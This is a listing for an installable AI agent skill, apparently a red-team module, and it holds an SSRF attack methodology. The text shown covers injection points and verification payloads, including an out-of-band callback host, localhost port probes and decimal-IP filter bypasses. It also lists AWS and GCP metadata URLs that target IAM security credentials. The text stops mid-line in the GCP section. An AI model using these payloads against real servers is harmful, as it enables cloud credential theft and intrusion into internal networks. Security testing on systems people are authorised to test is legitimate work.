ssrflisted

Server-Side Request Forgery expert methodology covering basic SSRF, blind SSRF, cloud metadata endpoint attacks, DNS rebinding, and protocol smuggling. Includes filter bypass and post-exploitation pivoting.
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63

Install: claude install-skill sunilgentyala/OmniRed

# Server-Side Request Forgery (SSRF) ## Attack Surface Any server-side feature that makes outbound requests using user-supplied URLs or hostnames: webhook URLs, document fetchers (PDF generation, URL preview), image loaders, API proxy endpoints, import from URL features, XML parsers with external entity support, PDF converters, health check endpoints. ## Methodology ### Phase 1 — Identify SSRF injection points ``` Test all URL/hostname parameters with: http://169.254.169.254/ Look for: webhook_url=, callback=, url=, endpoint=, host=, server=, destination= Test HTTP headers: X-Forwarded-Host, Host, Referer Check XML inputs (potential XXE with SSRF) ``` ### Phase 2 — Basic SSRF verification ``` http://burpcollaborator.net -- OOB verification http://127.0.0.1:80 -- localhost access http://127.0.0.1:22 -- SSH port (timing-based detection) http://127.0.0.1:3306 -- MySQL http://0.0.0.0 -- alternative localhost http://[::1] -- IPv6 localhost http://2130706433 -- 127.0.0.1 in decimal ``` ### Phase 3 — Cloud metadata endpoint attacks **AWS:** ``` http://169.254.169.254/latest/meta-data/ http://169.254.169.254/latest/meta-data/iam/security-credentials/ http://169.254.169.254/latest/user-data/ http://[fd00:ec2::254]/latest/meta-data/ (IPv6) ``` **GCP:** ``` http://metadata.google.internal/computeMetadata/v1/ http://169.254.169.254/computeMetadata/v1/ -H "Metadata-Flavor: G